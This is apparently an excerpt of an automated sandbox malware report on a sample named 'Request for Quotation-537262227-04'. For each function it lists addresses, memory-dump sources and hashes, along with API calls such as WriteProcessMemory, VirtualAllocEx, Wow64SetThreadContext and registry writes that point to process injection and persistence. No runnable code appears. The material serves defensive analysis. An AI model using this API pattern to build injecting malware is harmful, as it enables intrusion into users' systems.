                                                • String ID: $eq
                                                • API String ID: 0-731066626
                                                • Opcode ID: ead4ae11b6be00d6838b4ff60b7ced46a3f58862eb8da900e1eda4dfd07d86ef
                                                • Instruction ID: 847b98fe52958207bd3e4118bc34b2c1fafc7504e9808f35c08912d9c48e139e
                                                • Opcode Fuzzy Hash: ead4ae11b6be00d6838b4ff60b7ced46a3f58862eb8da900e1eda4dfd07d86ef
                                                • Instruction Fuzzy Hash: 69E19CB0B042168FE7A99F39D51573EBBE6AF84310F148529E582CB391DB38CD458BE1
                                                Function 063C74A5 Relevance: 1.6, APIs: 1, Instructions: 145fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CopyFileA.KERNEL32(?,?,?), ref: 063C75F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: CopyFile
                                                • String ID:
                                                • API String ID: 1304948518-0
                                                • Opcode ID: aa0a64240a99ffe4154d05b6db21439f819a2cf5402353ed64ab677394eb0b8f
                                                • Instruction ID: 35c25df7668c9ff91fbb8cdd6a9b16722b28b0798fc4f78df09640a8e4c046de
                                                • Opcode Fuzzy Hash: aa0a64240a99ffe4154d05b6db21439f819a2cf5402353ed64ab677394eb0b8f
                                                • Instruction Fuzzy Hash: D9514871D006598FDB50CFA9C9857AEBBF2FF48320F148629E815EB284EB749845CF91
                                                Function 063C74B0 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CopyFileA.KERNEL32(?,?,?), ref: 063C75F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: CopyFile
                                                • String ID:
                                                • API String ID: 1304948518-0
                                                • Opcode ID: c74fd038ae57ee44c1ced45dfaf9952183f7207f645ba6c065958c914386c7f9
                                                • Instruction ID: 88b9ab02c1a2487faf6330033399136ed9386eb3a8bb9a9a4a275b700ef764c4
                                                • Opcode Fuzzy Hash: c74fd038ae57ee44c1ced45dfaf9952183f7207f645ba6c065958c914386c7f9
                                                • Instruction Fuzzy Hash: 65515871D006598FDB50CFA9C9857AEBBF2FF48320F148529E814E7280EB749845CF81
                                                Function 063C78B4 Relevance: 1.6, APIs: 1, Instructions: 113registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegSetValueExA.KERNEL32(?,?,?,?,00000000,?), ref: 063C79C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: Value
                                                • String ID:
                                                • API String ID: 3702945584-0
                                                • Opcode ID: 83f4a9ef9cee7a4045bf53255cd35910680b5930d50488cd6e2a0a35083b7895
                                                • Instruction ID: ba7a3259995c37135c09c8a43b623d1cebba64ef9a9ca088c6235c947f1aa116
                                                • Opcode Fuzzy Hash: 83f4a9ef9cee7a4045bf53255cd35910680b5930d50488cd6e2a0a35083b7895
                                                • Instruction Fuzzy Hash: FF4153B1D102599FDB60CFA9C885B9EBBB1FF48320F14852EE819AB240DB749845CF91
                                                Function 063C78C0 Relevance: 1.6, APIs: 1, Instructions: 110registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegSetValueExA.KERNEL32(?,?,?,?,00000000,?), ref: 063C79C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: Value
                                                • String ID:
                                                • API String ID: 3702945584-0
                                                • Opcode ID: 1999b59cf8af434cc761928fa18aa8a440f6060cb8fa371558da8d0f504369aa
                                                • Instruction ID: b0f7008d376a8eb1e0f264049646c6d3a5481e8d548d8fedb69ebb5825b3ee0b
                                                • Opcode Fuzzy Hash: 1999b59cf8af434cc761928fa18aa8a440f6060cb8fa371558da8d0f504369aa
                                                • Instruction Fuzzy Hash: 384164B1D102199FDB60CFA9C885B9EBBF5FF48320F14852EE818AB240DB759845CF91
                                                Function 063C76ED Relevance: 1.6, APIs: 1, Instructions: 104registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 063C77E3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: df13c58b0373c88dfd12e400992ab8e8dcbe1e77433c7ba529683d9cd3a05640
                                                • Instruction ID: aa6cad82e5595d8b15d770318e5b1ae75d565b0b2f8c322a4b665e61005e75ba
                                                • Opcode Fuzzy Hash: df13c58b0373c88dfd12e400992ab8e8dcbe1e77433c7ba529683d9cd3a05640
                                                • Instruction Fuzzy Hash: 5B4164B1D112189FDB50CFA9C885BAEBBF5FF48320F14842EE818AB250DB749845CF91
                                                Function 063C76F8 Relevance: 1.6, APIs: 1, Instructions: 102registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 063C77E3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: 4a6eb8e1f2087aa66a64b6971f1b5c0759f9a7a8e344eda8b369dd20e12dd00b
                                                • Instruction ID: 6a9c2aaa0c4a158bdad0ebe863616bd63c1c01e8ee79c688382935d98535008f
                                                • Opcode Fuzzy Hash: 4a6eb8e1f2087aa66a64b6971f1b5c0759f9a7a8e344eda8b369dd20e12dd00b
                                                • Instruction Fuzzy Hash: 734142B1D1021C9FDB10CFA9C885AAEBBF5FF48320F14852AE818AB250DB749845CF91
                                                Function 063C5E18 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 063C5EB0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 0d2efd95af9d9010c2e211b9860e66f5134a7b6b59ed8cec3eb6d1d1ba1cae88
                                                • Instruction ID: b9a5a9f9b4632e309d42c45ab3a6c64f31bfe7c00783f8dd07d3e0c656eae9fd
                                                • Opcode Fuzzy Hash: 0d2efd95af9d9010c2e211b9860e66f5134a7b6b59ed8cec3eb6d1d1ba1cae88
                                                • Instruction Fuzzy Hash: EB214875D003099FCB10CFA9C984BDEBBF5FF88320F14842AE518A7240C7789954DBA0
                                                Function 063C5E20 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 063C5EB0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: dfba70a7159b3834bc5380a006628aa5dcb2d225026c49db8408d0d654412bf1
                                                • Instruction ID: 9362d91f6a96e49105579f69c56929d2d6d275c4df2f9e6caf6ce069a0fea511
                                                • Opcode Fuzzy Hash: dfba70a7159b3834bc5380a006628aa5dcb2d225026c49db8408d0d654412bf1
                                                • Instruction Fuzzy Hash: 0F213675D003199FDB10CFA9C885BEEBBF5FF48320F14842AE918A7240C778A954DBA4
                                                Function 063C58F8 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 063C597E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 757d98438c628c541bf67566eac6a6773e56c7acda1cf06e3988baaf0e324785
                                                • Instruction ID: 9e77d7bc5c70a61fddb2303640d8c8618559b23ab252f8731a47d92044d30f49
                                                • Opcode Fuzzy Hash: 757d98438c628c541bf67566eac6a6773e56c7acda1cf06e3988baaf0e324785
                                                • Instruction Fuzzy Hash: 15214871D002098FDB10DFAAC885BEEBBF4EF59324F548429D459A7241CB78A944CBA0
                                                Function 0272CC9C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0272D076,?,?,?,?,?), ref: 0272D137
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2155589502.0000000002720000.00000040.00000800.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2720000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 39189f5d5678b4d20d0f2ca187ef51a64d334fa3c4a307c577f60cf1a841979e
                                                • Instruction ID: 734e022be51bba24e7aa2bde986c749c3d201f2e147aaa067d1929c692e6fcd0
                                                • Opcode Fuzzy Hash: 39189f5d5678b4d20d0f2ca187ef51a64d334fa3c4a307c577f60cf1a841979e
                                                • Instruction Fuzzy Hash: 0021E4B5900258DFDB20CF9AD984AEEBBF9FB48310F14845AE918B7310D374A944DFA5
                                                Function 0272D0AB Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0272D076,?,?,?,?,?), ref: 0272D137
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2155589502.0000000002720000.00000040.00000800.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2720000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 5cfac5c476d0211bcda9a15849f90155c43d267a7e820685b8a7ebb2e816c07e
                                                • Instruction ID: 8629537a0a0df75525b9cef2def506d42366c54cea7daa997aa3053b40fba70f
                                                • Opcode Fuzzy Hash: 5cfac5c476d0211bcda9a15849f90155c43d267a7e820685b8a7ebb2e816c07e
                                                • Instruction Fuzzy Hash: 6621E4B5900259DFDB10CF9AD984ADEBFF4EB48320F14841AE918A7310D379A945CF61
                                                Function 063C6209 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 063C6284
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 0fc1ae3745d337a9d9dded5befd9a3ab184f7bfb351d9ff844595eb96bfd14ab
                                                • Instruction ID: b04cf286a28e29a19a26e8dcc40add6a30072e2729bc35d05874d59007390a22
                                                • Opcode Fuzzy Hash: 0fc1ae3745d337a9d9dded5befd9a3ab184f7bfb351d9ff844595eb96bfd14ab
                                                • Instruction Fuzzy Hash: A92139728002099FDB10DFAAC981BEEBBF4FF48320F148429E419A7240CB399944CFA1
                                                Function 063C5900 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 063C597E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: a7a1cc99a9cc7e917205ac5b9c75fe304e8fefef36de5474177a497fef8f3b32
                                                • Instruction ID: 85dad13679e06b79b38993d1941d737cb02992acae21d516578f95427cd0853f
                                                • Opcode Fuzzy Hash: a7a1cc99a9cc7e917205ac5b9c75fe304e8fefef36de5474177a497fef8f3b32
                                                • Instruction Fuzzy Hash: FA213A71D003098FDB10DFAAC4857AEBBF4EF48324F54842DD459A7240CB78A944CFA0
                                                Function 063C6210 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 063C6284
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: b4568a2ee31f6ea0d164b150cac3d1e44987939048e15bc38bfe37033e3968f9
                                                • Instruction ID: 354196f5484d00943b87dd2204f79683f2b7a6b51f0d6ded6fb89cf63038dd13
                                                • Opcode Fuzzy Hash: b4568a2ee31f6ea0d164b150cac3d1e44987939048e15bc38bfe37033e3968f9
                                                • Instruction Fuzzy Hash: F1211871C002098FDB10DFAAC985AAEBBF4EF88320F148429D419A7240DB799944DFA1
                                                Function 063C5D18 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 063C5D8E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: b00cfac64746a3c9fcbf181e3c861cb649d66c89a3b9a8ee8b47992b3db5d066
                                                • Instruction ID: 70ed822cc69112330493f2dcb6c3280a42bc5868ebe38cd949461d0cac4a0b83
                                                • Opcode Fuzzy Hash: b00cfac64746a3c9fcbf181e3c861cb649d66c89a3b9a8ee8b47992b3db5d066
                                                • Instruction Fuzzy Hash: 06113A759002499FDB20DFA9C944AEFBBF5FF88320F148819E519A7250CB359954DFA0
                                                Function 0641DA68 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 0641DADC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177322133.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6410000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: afdec282bba2054c90c5c380883fb451cbd6d1e1ea3fd5bb84bb411229a41fa0
                                                • Instruction ID: 2c41b82aa7dd0cac29bb0f18292726ee09c261bdcb08e6567a4114dda85a6e4d
                                                • Opcode Fuzzy Hash: afdec282bba2054c90c5c380883fb451cbd6d1e1ea3fd5bb84bb411229a41fa0
                                                • Instruction Fuzzy Hash: 1E1108B1D002099FDB10DFAAC884AAEFBF4EF48320F14842AD519A7250DB759944CFA1
                                                Function 027292CB Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0272933D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2155589502.0000000002720000.00000040.00000800.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2720000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: a251ff1b9083dd0193f6ec0ad558b3987692b60ee2b0736c7a1dd1c409ed60d1
                                                • Instruction ID: d837ea2d27e2670f11c298245e61720454cf6c1a46f2e22771d0b0edab8cdcb1
                                                • Opcode Fuzzy Hash: a251ff1b9083dd0193f6ec0ad558b3987692b60ee2b0736c7a1dd1c409ed60d1
                                                • Instruction Fuzzy Hash: 7A11E6B5C05398CFDB12CF95D5043EEBFF4EB0A324F188499D589A7282C339960ACB61
                                                Function 063C5D20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 063C5D8E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 958c1dda968151570fc00bdd272625fee6c85874dc52c3dab9c023db5f951e96
                                                • Instruction ID: 9371d7dbc819b8ffd6843aa4ff023860774fa60b5c40901555966a4f2859e6af
                                                • Opcode Fuzzy Hash: 958c1dda968151570fc00bdd272625fee6c85874dc52c3dab9c023db5f951e96
                                                • Instruction Fuzzy Hash: 321179728003099FCB10CFAAC844AEFBFF5EF88320F148819E519A7250CB35A940CFA0
                                                Function 027292D8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0272933D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2155589502.0000000002720000.00000040.00000800.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2720000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 8003cf4b54a9c1072dde2152935fb65ad520050c04b91c7f2d3ead40839b7f0f
                                                • Instruction ID: 9f0aadcad3b6bdeaeb496caafb69fe878abf63e03b8965cc2b8e3bda8070bd40
                                                • Opcode Fuzzy Hash: 8003cf4b54a9c1072dde2152935fb65ad520050c04b91c7f2d3ead40839b7f0f
                                                • Instruction Fuzzy Hash: 0611B2B5804398CFDB11CF55D5047EEBFF4EB0A314F548499D589A3282C3399605CBA5
                                                Function 0272A9B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0272AA1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2155589502.0000000002720000.00000040.00000800.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2720000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 3e4c94d9e185783def31b4abb049616391a1635d2ecc1980f9eb2e60d446762a
                                                • Instruction ID: 336a3ae79500e87ca436a20b979768bb273d1ba4db90913f79333e2d7c683fb7
                                                • Opcode Fuzzy Hash: 3e4c94d9e185783def31b4abb049616391a1635d2ecc1980f9eb2e60d446762a
                                                • Instruction Fuzzy Hash: 3C11E0B6C002598FDB10CF9AD944ADEFBF8EF88324F14846AD419B7210C379A545CFA5
                                                Function 0623EE7A Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq
                                                • API String ID: 0-1552367303
                                                • Opcode ID: 62a209f8e63bfa3dd66ddf0c8c839f1bd38cc5c27824139d47b89752db94f0ea
                                                • Instruction ID: 53dea2f7aee7b91943765c69de7b0bb52a1e96246e575d38320b9cdf85d76f90
                                                • Opcode Fuzzy Hash: 62a209f8e63bfa3dd66ddf0c8c839f1bd38cc5c27824139d47b89752db94f0ea
                                                • Instruction Fuzzy Hash: 35B1FB74A20219DFCB54DFA4D998E9DBBB2FF88300F158559E946AB361DB30EC46CB40
                                                Function 0639B550 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (iq
                                                • API String ID: 0-3943945277
                                                • Opcode ID: f11ac0a5ee7367fa20e4fac8977cd70282feb27d510bf7a85a887da593e91999
                                                • Instruction ID: 9a29b08d8b74bdb8255971d6e964114caca4592e4e920e350d9a9be8344f85cd
                                                • Opcode Fuzzy Hash: f11ac0a5ee7367fa20e4fac8977cd70282feb27d510bf7a85a887da593e91999
                                                • Instruction Fuzzy Hash: 6761BF35A102168FCB10DF68E484A6BFBB6FF85320B158569E556DB281DB30F855CFE0
                                                Function 0639A590 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: piq
                                                • API String ID: 0-198074023
                                                • Opcode ID: 7fdbabbc343cf3937fe781f4b6370b5955a1bb193e76a8c2bbf96f31f9dac9b6
                                                • Instruction ID: 4958973f1f40a6d62124df292ad4bc657a3a020e16d3bdfc02bd7c24c63a0c56
                                                • Opcode Fuzzy Hash: 7fdbabbc343cf3937fe781f4b6370b5955a1bb193e76a8c2bbf96f31f9dac9b6
                                                • Instruction Fuzzy Hash: FA514F76600110AFCB469FA9C805D5A7FF6FF8D31071680D8E2099B272DB32DC11EB91
                                                Function 06372FB8 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (iq
                                                • API String ID: 0-3943945277
                                                • Opcode ID: 4120e38db841145b5db070feaffe6f492f29ef8c9cbd95b40df24b573e4eeac0
                                                • Instruction ID: 1c36801b0f7e6ca8c8b2abf2964fbfe0d01205096878ba237d422c535732be4f
                                                • Opcode Fuzzy Hash: 4120e38db841145b5db070feaffe6f492f29ef8c9cbd95b40df24b573e4eeac0
                                                • Instruction Fuzzy Hash: 1C51B136614240AFCB56DF68D814D59BFB6FF89320B1580EAE245CB272CB36DC11DB90
                                                Function 06371F68 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq
                                                • API String ID: 0-1552367303
                                                • Opcode ID: b25d715b06cafc369545ce75da13703c525e75bf360af14ba70a35d5741c4945
                                                • Instruction ID: 31bd76ce12e0738f283832ee62d50c1e53f9f08b2833db7caa1964960da151e0
                                                • Opcode Fuzzy Hash: b25d715b06cafc369545ce75da13703c525e75bf360af14ba70a35d5741c4945
                                                • Instruction Fuzzy Hash: BF41A870B206148FCB94EB64C854AAEB7B7EFC9700F10451EE542AB394CF749C46CB91
                                                Function 06232289 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TJjq
                                                • API String ID: 0-2687929720
                                                • Opcode ID: 57b5cbb3f81f0fbcacd774a0c868f87a03d6cb07a4ee60cabc01386925d93dc2
                                                • Instruction ID: 1a7057514c383e6d9a27f157941fd39c796cc41bd333f0f0bf7205941e0af36d
                                                • Opcode Fuzzy Hash: 57b5cbb3f81f0fbcacd774a0c868f87a03d6cb07a4ee60cabc01386925d93dc2
                                                • Instruction Fuzzy Hash: DF51F5B8D21218DFDB44DFA9DA84AADBBB1FF88300F10806AE915A3360DB755E41DF50
                                                Function 06232298 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TJjq
                                                • API String ID: 0-2687929720
                                                • Opcode ID: a41483981680fa5d8f2d87a2554b53e89b8130fb899c2627c72bf37bdff08f06
                                                • Instruction ID: 9adfd48ad337e04d75e1115cfc7ac2b4a3e605c90722aa2159bb7ecee53d1865
                                                • Opcode Fuzzy Hash: a41483981680fa5d8f2d87a2554b53e89b8130fb899c2627c72bf37bdff08f06
                                                • Instruction Fuzzy Hash: F751E6B8D21218DFDB44DFA9DA84AADBBF1FF88301F10806AE915A3360DB755A41DF50
                                                Function 06371960 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq
                                                • API String ID: 0-1552367303
                                                • Opcode ID: 752b4fbb0e2cf9eff537c1957f6327b7947f6071ba26975fac81f6f3a81e75e8
                                                • Instruction ID: 93196326b1c5cc6608a4cd2846e1d6b6eeebdf8a7cd060bef71512d0186f9baa
                                                • Opcode Fuzzy Hash: 752b4fbb0e2cf9eff537c1957f6327b7947f6071ba26975fac81f6f3a81e75e8
                                                • Instruction Fuzzy Hash: BF417A763006109FD359DB69C855B2BB7A6EFC8704F214468E606CB3A2DF75EC42CB90
                                                Function 06371970 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
